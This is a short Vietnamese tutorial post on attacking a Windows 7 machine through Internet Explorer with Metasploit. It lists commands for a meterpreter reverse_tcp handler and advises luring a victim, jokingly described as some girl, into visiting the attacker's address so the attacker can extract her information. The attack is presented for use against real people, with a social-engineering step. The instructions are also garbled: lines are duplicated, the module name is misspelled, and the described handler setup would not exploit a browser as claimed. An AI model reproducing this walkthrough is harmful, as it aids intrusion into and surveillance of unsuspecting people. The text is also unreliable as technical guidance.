Metasploit via Internet Explorer
Tình cờ tôi phát hiện ra một cách attack thông qua Internet Explorer khá hay 😊😊😊
Tôi sẽ hướng dẫn các bạn ngay sau đây.
OS attacker: Kali Linux 2017.2
OS target: Windows 7 Ultimate 32bit
Tôi sẽ hướng dẫn các bạn ngay sau đây.
OS attacker: Kali Linux 2017.2
OS target: Windows 7 Ultimate 32bit
B1: Chọn module exloit/multi/handler: use exloit/multi/handler
và chọn PAYLOAD windows/meterpreter/reverse_tcp: set PAYLOAD windows/meterpreter/reverse_tcp
B2: Set các option của module này yêu cầu vào:
LHOST: host listen(host lắng nghe)
B3: Nhập lệnh khai thác: exploit
B4: Sau đó ta dụ mục tiêu(1 em nào đó hehe) nhập vào internet explorer địa chỉ như trên: http://192.168.136.128:4444
Lưu ý: Các trình duyệt hiện đại nhưng Chrome hay Firefox thì không thể khai thác được 😃
Sau đó thì ae ta cùng khai thác thông tin của mục tiêu thôi 😀😀
1 Lưu ý nữa là nếu tắt trình duyệt đó đi thì đồng nghĩa với việc session đó die nhé hehe(ăn của chế khó lắm)
OK [+] Done
See you again 😜😜😜
